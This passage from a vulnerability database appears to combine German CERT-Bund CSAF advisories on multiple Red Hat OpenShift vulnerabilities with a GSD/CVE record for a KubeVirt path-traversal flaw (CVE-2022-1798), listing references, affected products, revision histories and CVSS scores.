RHSA-2022:6890 vom 2022-10-11", "url": "https://access.redhat.com/errata/RHSA-2022:6890" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS2DOCKER-2022-020 vom 2022-10-14", "url": "https://alas.aws.amazon.com/AL2/ALASDOCKER-2022-020.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS2-2022-1863 vom 2022-10-21", "url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1863.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS2-2022-1861 vom 2022-10-21", "url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1861.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS2-2022-1858 vom 2022-10-21", "url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1858.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS2-2022-1860 vom 2022-10-21", "url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1860.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS2-2022-1865 vom 2022-10-21", "url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1865.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS2-2022-1864 vom 2022-10-21", "url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1864.html" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS2-2022-1862 vom 2022-10-21", "url": "https://alas.aws.amazon.com/AL2/ALAS-2022-1862.html" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:8609 vom 2022-11-23", "url": "https://access.redhat.com/errata/RHSA-2022:8609" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:0814 vom 2023-02-20", "url": "https://access.redhat.com/errata/RHSA-2023:0814" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2023:2002-1 vom 2023-04-25", "url": "https://lists.suse.com/pipermail/sle-security-updates/2023-April/014584.html" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:3229 vom 2023-05-19", "url": "https://access.redhat.com/errata/RHSA-2023:3229" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:3557 vom 2023-06-10", "url": "https://access.redhat.com/errata/RHSA-2023:3557" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2024:0799-1 vom 2024-03-07", "url": "https://lists.suse.com/pipermail/sle-security-updates/2024-March/018108.html" } ], "source_lang": "en-US", "title": "Red Hat OpenShift: Mehrere Schwachstellen", "tracking": { "current_release_date": "2024-03-07T23:00:00.000+00:00", "generator": { "date": "2024-03-08T10:10:23.986+00:00", "engine": { "name": "BSI-WID", "version": "1.3.0" } }, "id": "WID-SEC-W-2022-1312", "initial_release_date": "2022-09-06T22:00:00.000+00:00", "revision_history": [ { "date": "2022-09-06T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2022-09-22T22:00:00.000+00:00", "number": "2", "summary": "Neue Updates von SUSE und Red Hat aufgenommen" }, { "date": "2022-10-11T22:00:00.000+00:00", "number": "3", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2022-10-13T22:00:00.000+00:00", "number": "4", "summary": "Neue Updates von Amazon aufgenommen" }, { "date": "2022-10-23T22:00:00.000+00:00", "number": "5", "summary": "Neue Updates von Amazon aufgenommen" }, { "date": "2022-11-22T23:00:00.000+00:00", "number": "6", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-02-20T23:00:00.000+00:00", "number": "7", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-04-25T22:00:00.000+00:00", "number": "8", "summary": "Neue Updates von SUSE aufgenommen" }, { "date": "2023-05-18T22:00:00.000+00:00", "number": "9", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-06-11T22:00:00.000+00:00", "number": "10", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2024-03-07T23:00:00.000+00:00", "number": "11", "summary": "Neue Updates von SUSE aufgenommen" } ], "status": "final", "version": "11" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_name", "name": "Amazon Linux 2", "product": { "name": "Amazon Linux 2", "product_id": "398363", "product_identification_helper": { "cpe": "cpe:/o:amazon:linux_2:-" } } } ], "category": "vendor", "name": "Amazon" }, { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux", "product": { "name": "Red Hat Enterprise Linux", "product_id": "67646", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:-" } } }, { "category": "product_version", "name": "Cryostat 2 build", "product": { "name": "Red Hat Enterprise Linux Cryostat 2 build", "product_id": "T026436", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:cryostat_2_build" } } } ], "category": "product_name", "name": "Enterprise Linux" }, { "branches": [ { "category": "product_version_range", "name": "Virtualization \u003c 4.10.5", "product": { "name": "Red Hat OpenShift Virtualization \u003c 4.10.5", "product_id": "T024475", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:virtualization__4.10.5" } } }, { "category": "product_version", "name": "GitOps 1.8", "product": { "name": "Red Hat OpenShift GitOps 1.8", "product_id": "T026902", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:gitops_1.8" } } }, { "category": "product_version", "name": "GitOps 1.9", "product": { "name": "Red Hat OpenShift GitOps 1.9", "product_id": "T028023", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:gitops_1.9" } } } ], "category": "product_name", "name": "OpenShift" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "category": "product_name", "name": "SUSE Linux", "product": { "name": "SUSE Linux", "product_id": "T002207", "product_identification_helper": { "cpe": "cpe:/o:suse:suse_linux:-" } } } ], "category": "vendor", "name": "SUSE" } ] }, "vulnerabilities": [ { "cve": "CVE-2022-1798", "notes": [ { "category": "description", "text": "Es existiert eine Schwachstelle in Red Hat OpenShift. Der Fehler besteht, weil es m\u00f6glich ist, die kubeVirt-API zu nutzen, um auf Host-Dateien in einer KubeVirt-VM zuzugreifen. Ein entfernter, authentisierter Angreifer kann diese Schwachstelle ausnutzen, um vertrauliche Informationen offenzulegen." } ], "product_status": { "known_affected": [ "T028023", "T002207", "67646", "T026902", "398363", "T026436" ] }, "release_date": "2022-09-06T22:00:00Z", "title": "CVE-2022-1798" }, { "cve": "CVE-2022-1996", "notes": [ { "category": "description", "text": "Es existiert eine Schwachstelle in Red Hat OpenShift. Der Fehler besteht aufgrund eines benutzergesteuerten Schl\u00fcssels im GitHub-Repository emicklei/go-restful. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um die Sicherheitsma\u00dfnahmen zu umgehen." } ], "product_status": { "known_affected": [ "T028023", "T002207", "67646", "T026902", "398363", "T026436" ] }, "release_date": "2022-09-06T22:00:00Z", "title": "CVE-2022-1996" } ] }
wid-sec-w-2023-0204
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "mittel" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen.", "title": "Angriff" }, { "category": "general", "text": "- Linux", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2023-0204 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-0204.json" }, { "category": "self", "summary": "WID-SEC-2023-0204 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0204" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:4488 vom 2023-08-07", "url": "https://access.redhat.com/errata/RHSA-2023:4488" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:3915 vom 2023-07-06", "url": "https://access.redhat.com/errata/RHSA-2023:3915" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:3914 vom 2023-07-06", "url": "https://access.redhat.com/errata/RHSA-2023:3914" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:3664 vom 2023-06-19", "url": "https://access.redhat.com/errata/RHSA-2023:3664" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:3642 vom 2023-06-15", "url": "https://access.redhat.com/errata/RHSA-2023:3642" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:3542 vom 2023-06-14", "url": "https://access.redhat.com/errata/RHSA-2023:3542" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:1326 vom 2023-05-18", "url": "https://access.redhat.com/errata/RHSA-2023:1326" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:1328 vom 2023-05-18", "url": "https://access.redhat.com/errata/RHSA-2023:1328" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:2253 vom 2023-05-09", "url": "https://access.redhat.com/errata/RHSA-2023:2253" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:2282 vom 2023-05-09", "url": "https://access.redhat.com/errata/RHSA-2023:2282" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:2283 vom 2023-05-09", "url": "https://access.redhat.com/errata/RHSA-2023:2283" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:2357 vom 2023-05-09", "url": "https://access.redhat.com/errata/RHSA-2023:2357" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:2367 vom 2023-05-09", "url": "https://access.redhat.com/errata/RHSA-2023:2367" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:1529 vom 2023-03-30", "url": "https://access.redhat.com/errata/RHSA-2023:1529" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:1042 vom 2023-03-07", "url": "https://access.redhat.com/errata/RHSA-2023:1042" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:0895 vom 2023-02-28", "url": "https://access.redhat.com/errata/RHSA-2023:0895" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:0890 vom 2023-02-28", "url": "https://access.redhat.com/errata/RHSA-2023:0890" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:0408 vom 2023-01-25", "url": "https://access.redhat.com/errata/RHSA-2023:0408" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:0566 vom 2023-02-07", "url": "https://access.redhat.com/errata/RHSA-2023:0566" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:0652 vom 2023-02-15", "url": "https://access.redhat.com/errata/RHSA-2023:0652" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:0769 vom 2023-02-21", "url": "https://access.redhat.com/errata/RHSA-2023:0769" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2023:0774 vom 2023-02-22", "url": "https://access.redhat.com/errata/RHSA-2023:0774" } ], "source_lang": "en-US", "title": "Red Hat OpenShift: Mehrere Schwachstellen", "tracking": { "current_release_date": "2023-08-06T22:00:00.000+00:00", "generator": { "date": "2024-02-15T17:11:52.533+00:00", "engine": { "name": "BSI-WID", "version": "1.3.0" } }, "id": "WID-SEC-W-2023-0204", "initial_release_date": "2023-01-25T23:00:00.000+00:00", "revision_history": [ { "date": "2023-01-25T23:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2023-02-06T23:00:00.000+00:00", "number": "2", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-02-14T23:00:00.000+00:00", "number": "3", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-02-20T23:00:00.000+00:00", "number": "4", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-02-21T23:00:00.000+00:00", "number": "5", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-02-28T23:00:00.000+00:00", "number": "6", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-03-06T23:00:00.000+00:00", "number": "7", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-03-29T22:00:00.000+00:00", "number": "8", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-05-09T22:00:00.000+00:00", "number": "9", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-05-18T22:00:00.000+00:00", "number": "10", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-06-14T22:00:00.000+00:00", "number": "11", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-06-15T22:00:00.000+00:00", "number": "12", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-06-19T22:00:00.000+00:00", "number": "13", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-07-05T22:00:00.000+00:00", "number": "14", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2023-08-06T22:00:00.000+00:00", "number": "15", "summary": "Neue Updates von Red Hat aufgenommen" } ], "status": "final", "version": "15" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux", "product": { "name": "Red Hat Enterprise Linux", "product_id": "67646", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:-" } } }, { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift Container Platform \u003c 4.12.1", "product": { "name": "Red Hat OpenShift Container Platform \u003c 4.12.1", "product_id": "T025202", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:container_platform" } } }, { "category": "product_name", "name": "Red Hat OpenShift Container Platform 4.11", "product": { "name": "Red Hat OpenShift Container Platform 4.11", "product_id": "T025990", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:container_platform_4.11" } } }, { "category": "product_name", "name": "Red Hat OpenShift \u003c 4.12.0", "product": { "name": "Red Hat OpenShift \u003c 4.12.0", "product_id": "T026026", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:4.12.0" } } }, { "category": "product_name", "name": "Red Hat OpenShift Container Platform 4.12", "product": { "name": "Red Hat OpenShift Container Platform 4.12", "product_id": "T026435", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:container_platform_4.12" } } }, { "category": "product_name", "name": "Red Hat OpenShift Container Platform 4.13", "product": { "name": "Red Hat OpenShift Container Platform 4.13", "product_id": "T027760", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:container_platform_4.13" } } }, { "category": "product_name", "name": "Red Hat OpenShift Container Platform \u003c 4.11.43", "product": { "name": "Red Hat OpenShift Container Platform \u003c 4.11.43", "product_id": "T028132", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:container_platform__4.11.43" } } }, { "category": "product_name", "name": "Red Hat OpenShift Developer Tools and Services 4.11", "product": { "name": "Red Hat OpenShift Developer Tools and Services 4.11", "product_id": "T028205", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:developer_tools_and_services_4.11" } } }, { "category": "product_name", "name": "Red Hat OpenShift Container Platform \u003c 4.11.44", "product": { "name": "Red Hat OpenShift Container Platform \u003c 4.11.44", "product_id": "T028416", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:container_platform__4.11.44" } } } ], "category": "product_name", "name": "OpenShift" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-38561", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2021-38561" }, { "cve": "CVE-2021-44716", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2021-44716" }, { "cve": "CVE-2021-44717", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2021-44717" }, { "cve": "CVE-2022-1705", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-1705" }, { "cve": "CVE-2022-1798", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-1798" }, { "cve": "CVE-2022-1962", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-1962" }, { "cve": "CVE-2022-23772", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-23772" }, { "cve": "CVE-2022-23773", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-23773" }, { "cve": "CVE-2022-23806", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-23806" }, { "cve": "CVE-2022-28131", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-28131" }, { "cve": "CVE-2022-29526", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-29526" }, { "cve": "CVE-2022-30629", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-30629" }, { "cve": "CVE-2022-30630", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-30630" }, { "cve": "CVE-2022-30631", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-30631" }, { "cve": "CVE-2022-30632", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-30632" }, { "cve": "CVE-2022-30633", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-30633" }, { "cve": "CVE-2022-30635", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-30635" }, { "cve": "CVE-2022-32148", "notes": [ { "category": "description", "text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen." } ], "product_status": { "known_affected": [ "T028132", "67646", "T025202", "T028416", "T026435", "T028205", "T025990", "T027760" ] }, "release_date": "2023-01-25T23:00:00Z", "title": "CVE-2022-32148" } ] }
gsd-2022-1798
Vulnerability from gsd
{ "GSD": { "alias": "CVE-2022-1798", "description": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.", "id": "GSD-2022-1798", "references": [ "https://www.suse.com/security/cve/CVE-2022-1798.html", "https://access.redhat.com/errata/RHSA-2022:6351", "https://access.redhat.com/errata/RHSA-2022:6526", "https://access.redhat.com/errata/RHSA-2022:6681", "https://access.redhat.com/errata/RHSA-2022:6890", "https://access.redhat.com/errata/RHSA-2023:0408" ] }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2022-1798" ], "details": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.", "id": "GSD-2022-1798", "modified": "2023-12-13T01:19:28.118584Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "security@google.com", "ID": "CVE-2022-1798", "STATE": "PUBLIC", "TITLE": "Path Traversal vulnerability in Kubevirt" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Kubevirt", "version": { "version_data": [ { "platform": "all", "version_affected": "\u003c", "version_value": "0.55.1" }, { "platform": "all", "version_affected": "\u003c", "version_value": "0.56.0" } ] } } ] }, "vendor_name": "Google LLC" } ] } }, "credit": [ { "lang": "eng", "value": "Oliver Brooks and James Klopchic of NCC Group" }, { "lang": "eng", "value": "Diane Dubois and Roman Mohr of Google" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible." } ] }, "generator": { "engine": "Vulnogram 0.0.9" }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-20 Improper Input Validation" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", "refsource": "CONFIRM", 